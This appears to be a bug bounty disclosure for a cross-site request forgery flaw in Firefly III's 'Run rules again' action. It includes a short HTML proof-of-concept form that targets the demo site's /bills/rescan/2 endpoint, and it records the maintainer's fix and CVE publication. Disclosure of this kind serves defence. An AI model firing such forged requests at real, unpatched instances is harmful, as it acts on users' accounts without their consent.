Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Valid

Reported on

Oct 23rd 2021


Description

there is a CSRF on Run rules again action

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.firefly-iii.org/bills/rescan/2">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the firefly-iii team and are waiting to hear back 2 years ago
James Cole validated this vulnerability 2 years ago
am0o0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole marked this as fixed with commit b42d8d 2 years ago
James Cole has been awarded the fix bounty
show.twig#L99-L129 has been validated
ShowController.php#L83-L97 has been validated
James Cole
2 years ago

Maintainer


Nice find, fixed!

Jamie Slome
2 years ago

CVE published! 🎊

to join this conversation